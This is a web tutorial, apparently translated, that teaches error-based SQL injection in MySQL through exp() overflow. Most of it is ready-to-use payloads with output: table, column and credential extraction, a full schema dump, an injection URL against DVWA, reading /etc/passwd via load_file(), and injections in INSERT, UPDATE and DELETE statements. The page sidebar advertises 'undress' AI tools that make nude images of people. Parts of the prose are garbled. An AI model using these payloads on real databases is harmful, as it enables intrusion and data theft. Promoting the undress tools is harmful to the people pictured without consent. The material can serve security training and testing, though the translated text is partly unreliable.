How to use exp for SQL error injection
0x01 Introduction Overview
The editor discovered another Double data overflow in MySQL. When we get the functions in MySQL, the editor is more interested in the mathematical functions. They should also contain some data types to save values. So the editor ran to test to see which functions would cause overflow errors. Then the editor discovered that when a value greater than 709 is passed, the function exp() will cause an overflow error.
<p>mysql> select exp(709);<br>+-----------------------+<br>| exp(709) |<br>+-----------------------+<br>| 8.218407461554972e307 |<br>+-----------------------+<br>1 row in set (0.00 sec)</p><p>mysql> select exp(710);<br>ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'</p>
In MySQL, the functions of exp, ln and log are opposite. To briefly introduce, both log and ln return the logarithm with e as the base, see equation :
<p>mysql> select log(15);<br>+------------------+<br>| log(15) |<br>+------------------+<br>| 2.70805020110221 |<br>+------------------+<br>1 row in set (0.00 sec)</p><p><br>mysql> select ln(15);<br>+------------------+<br>| ln(15) |<br>+------------------+<br>| 2.70805020110221 |<br>+------------------+<br>1 row in set (0.00 sec)</p>
The exponential function is the inverse function of the logarithmic function, exp() is the logarithmic function with e as the base, Such as the equation:
mysql> select exp(2.70805020110221); +-----------------------+ | exp(2.70805020110221) | +-----------------------+ | 15 | +-----------------------+ 1 row in set (0.00 sec)
0x02 Injection
When it comes to injection, we use negative queries to cause "DOUBLE value is out of range" error. As mentioned in the author's previous blog post, bitwise inversion of 0 will return "18446744073709551615". In addition, because the function returns 0 after successful execution, we will get *** unsigned by inverting the successfully executed function. BIGINT value.
<p>mysql> select ~0;<br>+----------------------+<br>| ~0 |<br>+----------------------+<br>| 18446744073709551615 |<br>+----------------------+<br>1 row in set (0.00 sec)</p><p><br>mysql> select ~(select version());<br>+----------------------+<br>| ~(select version()) |<br>+----------------------+<br>| 18446744073709551610 |<br>+----------------------+<br>1 row in set, 1 warning (0.00 sec)</p>
We use subqueries and bitwise negation to create a DOUBLE overflow error, and use this to inject data.
>`exp(~(select*from(select user())x))` mysql> select exp(~(select*from(select user())x)); ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'
0x03 Inject data
Get table name:
select exp(~(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x));
Get column name:
select exp(~(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x));
Retrieve data:
select exp(~ (select*from(select concat_ws(':',id, username, password) from users limit 0,1)x));0x04 Overnight
This query can dump all tables and columns from the current context. We could also dump out the entire database, but since we are extracting via an error, it will return very few results.
exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)) http://localhost/dvwa/vulnerabilities/sqli/?id=1' or exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))-- -&Submit=Submit#
0x05 Read the file
You can read the file through the load_file() function, but the author found that there are 13 lines restrictions, this statement can also be used in BIGINT overflow injections.
select exp(~(select*from(select load_file('/etc/passwd'))a));
Note that you cannot write to the file because this error only writes 0.
mysql> select exp(~(select*from(select 'hello')a)) into outfile 'C:/out.txt'; ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'hello' from dual)))' # type C:\out.txt 0
0x06 Injection in Insert
Just follow the steps
mysql> insert into users (id, username, password) values (2, '' ^ exp(~(select*from(select user())x)), 'Eyre'); ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'
DIOS queries can also be used for all insert, update and delete statements.
mysql> insert into users (id, username, password) values (2, '' | exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)), 'Eyre'); ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select '000 newdb::users::id newdb::users::username newdb::users::password' from dual)))'
0x07 Injection in Update
mysql> update users set password='Peter' ^ exp(~(select*from(select user())x)) where id=4; ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'
0x08 Injection in Delete
mysql> delete from users where id='1' | exp(~(select*from(select user())x)); ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'
Same as the previous BIGINT injection, exp injection Also applicable to MySQL5.5.5 and above. Previous versions were "silent" about this situation.
mysql> select version(); +---------------------+ | version() | +---------------------+ | 5.0.45-community-nt | +---------------------+ 1 row in set (0.00 sec) mysql> select exp(710); +----------+ | exp(710) | +----------+ | 1.#INF | +----------+ 1 row in set (0.00 sec) mysql> select exp(~0); +---------+ | exp(~0) | +---------+ | 1.#INF | +---------+ 1 row in set (0.00 sec)
There may be other functions that will generate this kind of error.
The above is the detailed content of How to use exp for SQL error injection. For more information, please follow other related articles on the PHP Chinese website!
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1375
52
What is the difference between HQL and SQL in Hibernate framework?
Apr 17, 2024 pm 02:57 PM
HQL and SQL are compared in the Hibernate framework: HQL (1. Object-oriented syntax, 2. Database-independent queries, 3. Type safety), while SQL directly operates the database (1. Database-independent standards, 2. Complex executable queries and data manipulation).
Usage of division operation in Oracle SQL
Mar 10, 2024 pm 03:06 PM
"Usage of Division Operation in OracleSQL" In OracleSQL, division operation is one of the common mathematical operations. During data query and processing, division operations can help us calculate the ratio between fields or derive the logical relationship between specific values. This article will introduce the usage of division operation in OracleSQL and provide specific code examples. 1. Two ways of division operations in OracleSQL In OracleSQL, division operations can be performed in two different ways.
Comparison and differences of SQL syntax between Oracle and DB2
Mar 11, 2024 pm 12:09 PM
Oracle and DB2 are two commonly used relational database management systems, each of which has its own unique SQL syntax and characteristics. This article will compare and differ between the SQL syntax of Oracle and DB2, and provide specific code examples. Database connection In Oracle, use the following statement to connect to the database: CONNECTusername/password@database. In DB2, the statement to connect to the database is as follows: CONNECTTOdataba
Detailed explanation of the Set tag function in MyBatis dynamic SQL tags
Feb 26, 2024 pm 07:48 PM
Interpretation of MyBatis dynamic SQL tags: Detailed explanation of Set tag usage MyBatis is an excellent persistence layer framework. It provides a wealth of dynamic SQL tags and can flexibly construct database operation statements. Among them, the Set tag is used to generate the SET clause in the UPDATE statement, which is very commonly used in update operations. This article will explain in detail the usage of the Set tag in MyBatis and demonstrate its functionality through specific code examples. What is Set tag Set tag is used in MyBati
What does the identity attribute in SQL mean?
Feb 19, 2024 am 11:24 AM
What is Identity in SQL? Specific code examples are needed. In SQL, Identity is a special data type used to generate auto-incrementing numbers. It is often used to uniquely identify each row of data in a table. The Identity column is often used in conjunction with the primary key column to ensure that each record has a unique identifier. This article will detail how to use Identity and some practical code examples. The basic way to use Identity is to use Identit when creating a table.
How to solve the 5120 error in SQL
Mar 06, 2024 pm 04:33 PM
Solution: 1. Check whether the logged-in user has sufficient permissions to access or operate the database, and ensure that the user has the correct permissions; 2. Check whether the account of the SQL Server service has permission to access the specified file or folder, and ensure that the account Have sufficient permissions to read and write the file or folder; 3. Check whether the specified database file has been opened or locked by other processes, try to close or release the file, and rerun the query; 4. Try as administrator Run Management Studio as etc.
How to use SQL statements for data aggregation and statistics in MySQL?
Dec 17, 2023 am 08:41 AM
How to use SQL statements for data aggregation and statistics in MySQL? Data aggregation and statistics are very important steps when performing data analysis and statistics. As a powerful relational database management system, MySQL provides a wealth of aggregation and statistical functions, which can easily perform data aggregation and statistical operations. This article will introduce the method of using SQL statements to perform data aggregation and statistics in MySQL, and provide specific code examples. 1. Use the COUNT function for counting. The COUNT function is the most commonly used
Database technology competition: What are the differences between Oracle and SQL?
Mar 09, 2024 am 08:30 AM
Database technology competition: What are the differences between Oracle and SQL? In the database field, Oracle and SQL Server are two highly respected relational database management systems. Although they both belong to the category of relational databases, there are many differences between them. In this article, we will delve into the differences between Oracle and SQL Server, as well as their features and advantages in practical applications. First of all, there are differences in syntax between Oracle and SQL Server.
